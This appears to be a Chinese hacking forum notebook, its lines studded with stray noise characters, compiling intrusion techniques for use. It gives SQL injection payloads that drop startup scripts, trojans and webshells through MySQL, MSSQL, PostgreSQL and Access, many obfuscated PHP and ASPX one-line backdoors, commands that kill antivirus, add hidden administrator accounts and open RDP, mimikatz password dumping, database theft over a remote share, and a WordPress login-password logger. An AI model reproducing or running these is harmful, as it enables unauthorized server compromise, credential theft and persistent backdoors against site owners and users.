+ l! L1 h" H( |7 \7 E, J4 \% t
use test;+ y: Y1 k6 d& V, f1 b4 _
create table a (cmd text);
' W& }5 F- }8 {& h" L8 g( xinsert into a values ("set wshshell=createobject (""wscript.shell"") " );& ^8 G3 ^9 n+ r2 C( h3 }
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
9 K" I) ?% l5 u6 U1 R! d$ }insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
" i" L- k8 R7 qselect * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";
# y% U& z5 T) ?" w) M4 A5 Pdrop table a;
( p8 Z9 C* E& R6 w! `6 I9 y0 W, M0 X8 q9 F
英文版本:# [. s4 n; J' C. X" y! E
0 U- d% p2 ^7 m2 E, y0 A
use test;; Q. O1 d1 Z$ L/ n# j/ P/ H7 S
create table a (cmd text);
& ^: |2 G! \- c6 ]# W# @1 t' u0 s+ Hinsert into a values ("set wshshell=createobject (""wscript.shell"") " );
% i% t/ j) |, z; `insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
, u5 {5 G3 v3 f- Winsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );0 i3 Y1 N/ s1 O& q; a' o. Q( k
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
; s" k$ P0 b9 sdrop table a;/ T; o( K$ B- L: f9 _
$ ~7 Y( u/ H* P* S- r* lcreate table a (cmd BLOB);- ]$ q/ h* `3 o H5 q9 J
insert into a values (CONVERT(木马的16进制代码,CHAR));# K; W# R- s1 i: ^6 b: N9 w0 \
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe': A# J Q. v! F: {8 m% l5 P
drop table a;
) Y' m' D, o0 [9 w5 c3 I* x% {/ i% c& A& @
记录一下怎么处理变态诺顿
! ]7 H& f- y$ {1 E( m查看诺顿服务的路径4 ~0 a: g: r: \* P, v
sc qc ccSetMgr; M7 Y5 h1 s3 K# V
然后设置权限拒绝访问。做绝一点。。
t- e. J7 U/ Y/ I5 x& qcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
- u! ~$ t- N" K' S8 [& f) q" ccacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
: Z% H7 @4 [% f% M# Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
X1 [( F; a( t V- V- I, ncacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone& M1 P n- a S9 o3 ~
, q: u9 n0 [% n6 W然后再重启服务器
0 p/ ]8 N; c' viisreset /reboot
& ~8 B1 u/ e6 x* [; n% N* J这样就搞定了。。不过完事后。记得恢复权限。。。。
9 I1 ^+ m% ]) J2 P. tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F
% ?& }/ M% G2 r2 L4 ^% Z' |+ ?cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
, O5 j2 y$ B9 dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F1 y; \5 y2 d; g
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F4 u, h$ ^; d8 M, K) K4 k: n6 U
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin
& p, y3 k) L1 Y7 V% ?9 }1 r% i/ u/ W3 Y, s. T, M
EXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')7 j' t* |, Y2 V% K/ q9 G
! T" @& L5 z% |* ypostgresql注射的一些东西. V5 q+ n6 e# t) h7 M' |( U
如何获得webshell5 j" }# f) L! k2 d+ I
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
5 p; c- N8 V. z1 [* ?! @http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
! h) l% M& m* |2 @$ Ohttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;
0 Z t0 B' N. e. A$ m$ B如何读文件
! S: z/ ?# Z. x8 B4 b4 S0 `- ^. Ehttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);8 V: H$ f" b; i0 s% [0 C
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
7 u+ m, B! ]" o1 a# J; ~$ Q6 Chttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
1 O+ i2 P. @$ \! M8 \7 ]5 T
% H3 e6 Y/ G" I3 P& U" wz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
) F4 ~( D ~. S2 C2 U) R/ B7 z当然,这些的postgresql的数据库版本必须大于8.X. ]" ?3 r% e9 h4 q
创建一个system的函数:
) n3 u0 P4 _: v9 ]+ g0 T4 B" X) xCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
# S& u( i: j' b, ?' y8 r6 g8 D _8 ]4 W/ w3 j) q
创建一个输出表:
, H( k3 c! j8 a4 x& sCREATE TABLE stdout(id serial, system_out text)
2 r! J* |# m! ?. R7 b
7 c- \8 e: \$ p8 z& V. E P执行shell,输出到输出表内:
5 y- O; `+ x, i: W; {( Y9 t5 P) q9 JSELECT system('uname -a > /tmp/test')$ S0 H* a y& N0 g! t( d0 E# `
+ |$ @9 i& d* p+ Y) F) o: tcopy 输出的内容到表里面;
v. Z: b+ k, f: z% i/ bCOPY stdout(system_out) FROM '/tmp/test'
3 s. ~ U; Y; i# U4 c5 s4 R4 i" H* i$ p7 t: p
从输出表内读取执行后的回显,判断是否执行成功
6 P2 m; V7 m. l9 k' s
/ M: Q+ M9 N a2 H5 ` A3 C* oSELECT system_out FROM stdout
4 r1 E5 D5 F6 ^3 L9 w1 k% Z2 N下面是测试例子, K8 q% p9 c. K! `7 Y7 ]
, ?0 P' }, t4 m6 {- u* H& Z
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
. N( V/ w- b, S" C( m$ q
' E" r: y& C3 a* N7 A/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
/ V3 z1 o# @* \STRICT --
+ R# M3 s6 z) V) j
! t! b- u" v# K- A( W/store.php?id=1; SELECT system('uname -a > /tmp/test') --
( M) ~/ m5 Z& A( g5 s- A; R- ~) ?% r
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --- O% ?- m+ r0 R K. ~2 K& J3 F
) a5 I5 u( G! I5 Q- G
/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
# E+ L) I. _1 I' X) lnet stop sharedaccess stop the default firewall' `/ j, t7 {. a
netsh firewall show show/config default firewall/ z# H* K& W6 m: P" p* z- z
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall4 T( i. b( g8 ?# Z% O9 `/ K6 ~7 E
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
* M% t( q% F# m2 u. R7 n, U修改3389端口方法(修改后不易被扫出)7 M+ g8 X9 h2 D+ `) ~+ X
修改服务器端的端口设置,注册表有2个地方需要修改
. e4 q7 J5 r: W6 x9 K
' j/ v/ G& j0 [" x4 A% A[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]* ^, b5 o8 [5 p n+ H% |
PortNumber值,默认是3389,修改成所希望的端口,比如6000$ \* E W- M7 [
6 g0 {' `3 L# Y第二个地方:
' A) i+ e9 Q2 M3 E[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] % {5 R A- @' Q# N( d8 u+ i7 N2 t
PortNumber值,默认是3389,修改成所希望的端口,比如6000! S& V$ z4 l3 b- M
+ K$ P. X$ J S6 V4 B* j. }# V5 h现在这样就可以了。重启系统就可以了
2 v& e7 I" a; d/ T$ t# T& _) _3 e* Q3 T
查看3389远程登录的脚本
/ V Y( ~: x, ?4 F% @' C保存为一个bat文件. e6 d- g C: O
date /t >>D:\sec\TSlog\ts.log
2 N' {9 }5 D( F6 e1 k$ Ytime /t >>D:\sec\TSlog\ts.log. t( P: c9 q2 w1 G% i
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log G5 _' ~3 W5 h {: }' ?2 @
start Explorer6 z |$ ]% [: a0 @
7 p( R8 A$ `* D1 w! F2 _mstsc的参数:
$ R) l3 \% M/ F, m
2 B: L! k) {% d0 ?8 I* ^远程桌面连接. F% I9 E% K- p! `
' q& ^5 _% d- s$ b4 T) s4 J6 ]: t
MSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
2 y0 k. {0 g* d6 W' k/ ? [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?! i" P) D6 I9 D
5 [$ i9 ]8 i1 P }& b<Connection File> -- 指定连接的 .rdp 文件的名称。) @. O H# b/ L6 O6 D( @5 B
% B4 h+ p: k x) v8 c; v( y/v:<server[:port]> -- 指定要连接到的终端服务器。8 M" K' `" P/ K" H/ Z* o
& X$ V( y' K/ p/ i' Z7 d/console -- 连接到服务器的控制台会话。
7 i% g( I6 c( e8 R
, n) J! r9 @/ s' {: \% z5 ?/f -- 以全屏模式启动客户端。8 i1 G! M; ?; H$ g+ h
* @2 q' S$ c: c0 |7 {: ]/w:<width> -- 指定远程桌面屏幕的宽度。! J: t+ S4 A0 H& M3 v1 R2 p8 r
6 W* |7 M9 P1 y& p E5 R
/h:<height> -- 指定远程桌面屏幕的高度。
; ?" N: A2 G& C0 w: J/ Q4 m' [
, \: C8 e% \( v* O# M/edit -- 打开指定的 .rdp 文件来编辑。
3 D0 X* R A3 y' q8 ^# t7 N' [# l- F3 m$ `! }2 u( X
/migrate -- 将客户端连接管理器创建的旧版
4 ]& V2 G1 J3 U8 C% k连接文件迁移到新的 .rdp 连接文件。3 P0 `$ Q9 E1 B1 ]5 P8 j6 i
+ m( d, l @$ c4 g) {: ~& m$ S# M% J' H& s$ O/ i, b4 ^
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就 ]5 t8 I+ ]$ q/ l, T: c
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量/ |+ ]2 I0 N ^, W5 L- c7 p) k
- @" m* `8 Z+ R* n* w) r2 R1 o
命令行下开启3389
5 q# e8 _% G, |7 _' y% [ d3 g7 w- Jnet user asp.net aspnet /add
# Q; s, V- _( z0 t' s; [) c5 u+ pnet localgroup Administrators asp.net /add
; \; Y3 o* L- R' ]' K2 snet localgroup "Remote Desktop Users" asp.net /add
$ |$ h, d0 o2 C: y" p' Vattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D/ L# H6 x6 p* H3 _* H h K$ Q, Z
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0/ B4 M: W; n1 G
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 18 o3 t1 W0 A3 s
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f7 g) y W3 \3 G5 c4 u) O& C1 [
sc config rasman start= auto |2 |# d3 {$ t/ w+ h
sc config remoteaccess start= auto/ E: ?& u3 `: t5 Q/ q' ]
net start rasman
9 P. P4 L$ D! q4 ]- F! B5 jnet start remoteaccess! ~" B/ R6 z. |. P0 v
Media
: E4 u) _ C8 ]. m8 ~<form id="frmUpload" enctype="multipart/form-data"
0 [1 Y4 L/ O$ F* k" Qaction="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>/ V6 }3 i8 b% G) |7 Y" }
<input type="file" name="NewFile" size="50"><br>! A$ t) h" l. d
<input id="btnUpload" type="submit" value="Upload">: q5 h$ V% H7 h5 n9 c( H& Y8 m
</form>9 ~3 m9 W8 o5 {, Z6 Z
7 {1 H' y% k$ T* Kcontrol userpasswords2 查看用户的密码
; n+ o, V7 ]6 Q0 @# R) \: m; `4 Caccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
' P5 Y* a. {. g! m, {SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
- E O: ~# W# @) X, K3 V" C% n
9 ]' O7 m% q# q% L1 u141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:; ]2 F3 U' e) T" p r
测试1:
/ D' j9 }4 b) N! dSELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
2 b1 c- a2 t* }9 G' A6 c# R' ~2 E! ]" n- ~, E
测试2:$ Z% L: K3 w- ]; @2 Z( ~
3 J9 T* V: m, e: l9 ucreate table dirs(paths varchar(100),paths1 varchar(100), id int)& ?/ q4 g( k9 l3 q P% R
5 R9 W C+ b4 O# y8 ]
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--* f$ X/ e7 [. Z4 v- Q5 }* _
3 ]$ W' @- F2 p3 w+ X" H! @& @& YSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
6 L+ Z, @- Q% @关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令! Y. k! S9 y' t% |/ W5 s( W
可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
& j, S% H! T; @. S) e4 I' g& j. Rnet stop mcafeeframework' J( A$ j% D( g' g0 o Y' v
net stop mcshield
8 R$ ]( Z; e1 [( e9 Vnet stop mcafeeengineservice
6 W; Q* I; C/ n5 _- l: `. Q/ M; Mnet stop mctaskmanager
9 _- R3 A2 G& c2 J; @$ Mhttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D- j; x9 ]( A7 |7 t
# r. H! r+ x& i VNCDump.zip (4.76 KB, 下载次数: 1)
4 e% v! Q2 A W5 Q, Q# P% H2 g+ `. z密码在线破解http://tools88.com/safe/vnc.php9 s$ w+ Y' T9 T- u6 n
VNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取7 X# `) u, x* J' V
4 F3 l0 w6 t0 I* v, i3 |exec master..xp_cmdshell 'net user'
) j' u' ~& Y* B- Imssql执行命令。; x% l, `& z5 z; p
获取mssql的密码hash查询
3 E' m7 w# ?8 C A/ G- cselect name,password from master.dbo.sysxlogins
8 B/ [+ J5 K$ _! X- G8 ^0 k/ R8 d- `1 ?1 N5 h( d/ S% C# O N
backup log dbName with NO_LOG;
! O( A0 E) b3 S/ q6 a' z' vbackup log dbName with TRUNCATE_ONLY;- k' o* f) V3 I4 b: P' P4 x8 h
DBCC SHRINKDATABASE(dbName);2 B) e8 D. J: A3 L; p/ @
mssql数据库压缩5 G& l8 p4 e4 l; k7 @3 g
: [, R+ G% ]! X( wRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
9 n' A% _9 N1 m( F5 l" Z将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
% j+ F" o% ^# E2 R8 M7 E" P$ d3 p
" Z6 e- \" ?# L0 nbackup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'2 W! w- F2 j8 v( r
备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
# Q4 Q+ Z/ X& g1 G/ L$ i) e* V* {5 l& d. b A
Discuz!nt35渗透要点:
% S. U6 a2 a3 d$ z9 {(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default5 {# A8 z5 E, c( O, x
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
7 \' a$ c* M' h! ]- T* k(3)保存。
! {& F0 c8 l8 N( Z(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
5 R9 c8 B- J, y0 Z9 O* kd:\rar.exe a -r d:\1.rar d:\website\9 I7 |7 l" G" C; [: t/ c
递归压缩website+ Y) H5 q& \. V0 K9 m* r/ k
注意rar.exe的路径
- w' K' q; `1 F
0 f/ D+ Y' }, B' Q( C7 b<?php$ K& G( M7 A4 t0 o
2 s z0 s8 f( O+ ^$telok = "0${@eval($_POST[xxoo])}";
2 `' b* j5 V, K4 K2 z7 x# k5 o1 t7 @# r' t
$username = "123456";
1 T Y+ Q O* x6 |# N: [* _' p7 e( s6 i; @ e G5 ?" r$ U# ~
$userpwd = "123456";
: E* J% ~" M# {
, b [+ A- Q% w, E2 F5 W) Q& e$telhao = "123456";& P: ~( V% N) [+ t# U
/ f q8 s: P# ?$telinfo = "123456";
! R. w4 v& P4 |3 v* X" e# O" X3 ]- s( m" K/ Z5 z( m( `
?>- E& `! B7 c9 l* e. f3 V
php一句话未过滤插入一句话木马" E. i8 d2 L2 p4 F
+ O$ `, C: t+ o: Z# X r1 p站库分离脱裤技巧. s7 _6 ?% K) S1 ?
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
! C1 Q! F0 i* G/ @; j. }exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
4 e! J; L3 @( W4 o$ B) W条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。: s- ^& S; [- ^% d. W' t h% O; Z
这儿利用的是马儿的专家模式(自己写代码)。
/ p4 s" C# I+ G0 r8 p8 Xini_set('display_errors', 1);: C4 Z. _) U- c
set_time_limit(0);
' a+ I2 n4 w7 ~+ ierror_reporting(E_ALL);( T! I4 L# |8 ^4 m3 G
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error()); g }* s5 A! L. P2 e
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());
% U- Y0 D' ~; o1 M& A% i$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());
1 x* t. w C, R# \ W/ l4 w3 B9 w$i = 0;) D v q$ V( S* I# P
$tmp = '';
' K! k+ o( C' f: {while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
/ U ?( r. Y+ E7 @* P/ u/ | $i = $i+1;
, v' a# `+ D( k# i: N, y $tmp .= implode("::", $row)."\n";
- x% r& b$ M$ |4 K if(!($i%500)){//500条写入一个文件- ~) f" u" q! @" d( [
$filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';' U6 b% U- s8 i* H
file_put_contents($filename,$tmp);
; C: b% b$ J' o- ]. l $tmp = '';0 A+ B* q4 q3 w. R8 ]/ h/ ~
}3 c( q7 a+ @1 |- J5 J# q8 x
}4 ]" Q, f/ }! a! D; v# N y. B
mysql_free_result($result);
! ]6 t0 H3 G' w* r3 `$ M6 U8 o
0 w' q; m7 } o6 r
/ s2 X9 p, P# Q1 d7 q& Q; V8 `- v* l( ^ c' A7 ?" y5 a
//down完后delete7 Y6 u) K* | \% @& Y6 ?
3 @3 z$ V; b9 S- v2 {
! U4 e( ~0 M' F! s+ L0 \ini_set('display_errors', 1);
( d+ o4 i; U4 s7 }+ Ferror_reporting(E_ALL);
5 t( ]+ X& D6 F! {$i = 0;
$ _1 Q3 s$ X. }9 ]. A- |while($i<32) {
4 z: x9 y: R- V a* I4 c9 f $i = $i+1;# g- G" M# P, D6 b0 s9 e
$filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
) s, n9 G5 @8 t+ R% Y7 D8 P unlink($filename);
5 {9 j9 ]6 N" _6 {& J} 5 N' b9 {, l& w
httprint 收集操作系统指纹
( h1 J1 Q' k6 t5 _( q7 N扫描192.168.1.100的所有端口' S. ^: D, @1 m7 |
nmap –PN –sT –sV –p0-65535 192.168.1.100 _2 O4 G0 |8 E4 g2 I
host -t ns www.owasp.org 识别的名称服务器,获取dns信息* u/ T' [5 x$ b0 a. p" \
host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输& c4 {4 V# w* t' f- x" h5 ?
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
1 ~" L$ f) @: I' ?5 S* H: a
' X/ `0 C/ j% i2 m2 t3 bDomain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
8 Z6 ~$ f+ n7 u! O$ N
! Q" r G, M/ |/ p MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)% U9 e6 Y4 P6 W4 h$ P
' N7 \! C/ v* Q- a
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
h8 N( |1 {: S3 u4 V* O8 G
' E; J0 |0 P1 v9 ~6 ~1 m. U5 Q2 s DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
]7 _4 v4 o o+ V
. Y5 J( i! r) x; F2 { http://net-square.com/msnpawn/index.shtml (要求安装)
. u- ^' S. d" [; u& Y* V2 L5 A. z" l
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)
m7 y; {- q( o& H% c) @/ }! e. }. s$ ^7 R
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)# r# L2 {3 o5 A0 S( ?6 x
set names gb2312+ r# k* [; Q/ V3 C& g: W% q9 q T
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。/ M7 g& M! h& A: K0 M
% Y$ ~3 }: n7 ?! ^2 e; pmysql 密码修改( c% p. y! f1 p* h3 d! b
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
6 t' K N |$ A6 b3 Z6 L8 aupdate user set password=PASSWORD('antian365.com') where user='root';5 l8 _- W$ D& y# l. K m- ~
flush privileges;( z5 h1 Q# p, Q, t
高级的PHP一句话木马后门
0 A4 {, M% n1 ~! u
' ~1 H. P; F: X V入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀/ e9 _' _& @; N
1 w6 t4 \- m( R: `1 ]9 {
1、
$ k, D$ f. g" G
- O, ~) ?: T3 m& e$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";1 k- X- g" H% g, N
C+ X% T+ ? L8 z! h9 D0 V
$hh("/[discuz]/e",$_POST['h'],"Access");
: ~' z0 p: v5 h* q8 I# u0 {2 C- |6 r b4 i. K4 F5 J
//菜刀一句话
# {; b. j2 A$ I; r7 x) H/ I/ g* ]. L: s' J
2、- Y0 w4 v7 J1 D
4 ^$ Q8 Z# a5 {+ j; D& F7 k
$filename=$_GET['xbid'];
/ x& h5 Y h* n6 I' k0 H2 J0 P4 Z5 H5 y$ U/ f; X& T
include ($filename);# k0 V% x; e5 c3 U1 z
" n# ^7 q$ R+ L# n X& t//危险的include函数,直接编译任何文件为php格式运行
) N; [4 l* @1 ^/ Z0 D8 z+ ]- {$ E" X5 G1 H
3、 D2 ~8 y2 ?- A! U0 Q2 n! W/ ]6 m
) K" g, H$ `+ G G$ [$ }$reg="c"."o"."p"."y";, g# y7 y' R8 u v2 M* X$ `$ I
* E7 ` ^9 _+ Y2 A+ }$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);3 I3 e" X( Z( I1 Y N8 ]
: I9 g7 `; x4 V5 Q% b5 ?//重命名任何文件
) }9 ^5 V: ]7 o+ O+ W7 L# }( b, G! {# V
4、8 f2 M" P) u! w& B' w
4 c) q. x- }! D: a
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";. @& ]9 k% w7 r" ]
. \5 J1 {9 ?$ U+ e& ]2 a7 l! L- {$gzid("/[discuz]/e",$_POST['h'],"Access");
$ p& u8 {9 K: v- ^4 N- W/ v% a0 r5 Y8 j
//菜刀一句话" j7 V; h& v% ]) r
3 @$ s: L* h: `. U3 L1 U j, x
5、include ($uid);/ G5 A( L0 ~4 [" h2 N
6 M1 m+ p! ?9 N; O
//危险的include函数,直接编译任何文件为php格式运行,POST ; z8 ~0 j" S& g
( y7 v0 Y+ N2 l# }( h0 G' W
) o. v; R) B5 q/ r' c
//gif插一句话
8 \9 a2 A& P& @
: b+ B& O8 e' |- x4 v6、典型一句话
5 O t; k: {+ x4 T
$ X# T5 z8 D2 }/ {8 q程序后门代码0 \% l" Z" U# V5 `
<?php eval_r($_POST[sb])?>
2 v* c- A. T. a, _* }' R2 k7 [* r程序代码
3 W+ U: X- a+ D5 |6 f0 Z7 {<?php @eval_r($_POST[sb])?>$ D, q7 W5 d, f5 I3 b" k
//容错代码
8 h$ d% A5 T, e- V程序代码
& k$ H$ d4 h+ G9 P( M9 X% X3 d<?php assert($_POST[sb]);?>4 j1 Y; q, l) g) T2 y9 f4 Q `9 m, K
//使用lanker一句话客户端的专家模式执行相关的php语句
5 @# S1 [7 {+ }' D. d程序代码1 V: {# H, e5 D
<?$_POST['sa']($_POST['sb']);?>9 ]6 A$ k; e7 A. T6 ~
程序代码) o8 m+ ~) w/ k, e+ } }) H
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>
* S' v' O$ c( X( `3 {8 P' p* x D程序代码
# v5 P1 }0 @( B% W<?php
) K& Y: g' u* i Q7 s@preg_replace("/[email]/e",$_POST['h'],"error");
" C* P3 z) T; ?7 @3 P0 N. M$ _?>
) n3 c$ [# e, K* S//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入5 `4 n& D# a3 f2 e
程序代码) Q! x x* d0 @0 {2 t, l, [
<O>h=@eval_r($_POST[c]);</O>$ F- f3 g8 x7 a
程序代码
* J1 h/ i/ K E" `- q* U3 E<script language="php">@eval_r($_POST[sb])</script>
: m( Z2 U& X- e//绕过<?限制的一句话5 Z( f0 S+ @8 o9 I
0 a! s' B; O) \. v, nhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip3 c- p' d- ^+ x
详细用法:
3 T$ Z& A2 B% E9 N4 J1、到tools目录。psexec \\127.0.0.1 cmd
$ e) E5 W* T! ^2 z! E2、执行mimikatz, E- }" B( a1 q7 y9 E9 Q# V
3、执行 privilege::debug3 O' {6 Z B. R
4、执行 inject::process lsass.exe sekurlsa.dll
3 X1 a9 f6 M& B* B$ [. ]% M* {5、执行@getLogonPasswords/ ~& g9 o/ c" H- g
6、widget就是密码
" }0 {/ Z3 L. C7、exit退出,不要直接关闭否则系统会崩溃。; C; W: A3 [/ k
p0 d/ m3 s: W2 Y2 Jhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面! k0 j' n b( k5 _
) s8 z% Y/ |: I+ V0 ]
自动查找系统高危补丁1 ~$ q+ g! f. r! N4 u. K
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt4 O' |" E4 k; y: j0 a
4 _. _& ^$ ], X+ k7 q3 R突破安全狗的一句话aspx后门
+ |' @! m& K3 k) j9 I$ M* n# _* d$ G<%@ Page Language="C#" ValidateRequest="false" %>* @* d0 ~& v) K0 ~* Q$ }1 P) ^
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>
% U) r1 M$ Y6 L$ h( V; ewebshell下记录WordPress登陆密码
0 e$ v; G/ j8 B6 A3 ?' i; z, Rwebshell下记录Wordpress登陆密码方便进一步社工4 |5 L$ ]4 M" i& T' B
在文件wp-login.php中539行处添加:
" R' n" S, r9 R4 L// log password& L1 p& ]- o& [ M8 H
$log_user=$_POST['log'];3 l# z+ U& k2 }5 I7 \
$log_pwd=$_POST['pwd'];0 f3 c' P, Q2 B+ m" U
$log_ip=$_SERVER["REMOTE_ADDR"];( s' y' @8 p- j7 S9 H1 R2 V
$txt=$log_user.’|’.$log_pwd.’|’.$log_ip;
+ k* y4 y7 P T" ~3 @$txt=$txt.”\r\n”;, ]1 E0 d5 N' r
if($log_user&&$log_pwd&&$log_ip){
% f7 Z: J/ A; Z! o@fwrite(fopen(‘pwd.txt’,”a+”),$txt); W$ _9 G3 x7 @& l
}
; U/ |( X0 q Y$ r5 K M9 C7 w当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
( [4 L7 b1 J) b& O1 b0 L就是搜索case ‘login’2 t2 L3 A: I4 K4 X9 z1 o/ R
在它下面直接插入即可,记录的密码生成在pwd.txt中,+ C# M" v" V! d9 H) L" r' E1 m
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录5 T- y: e% Z/ o" z X% y2 ~
利用II6文件解析漏洞绕过安全狗代码:
, A" x% A. F& I# S; o;antian365.asp;antian365.jpg
2 i I f9 E( R
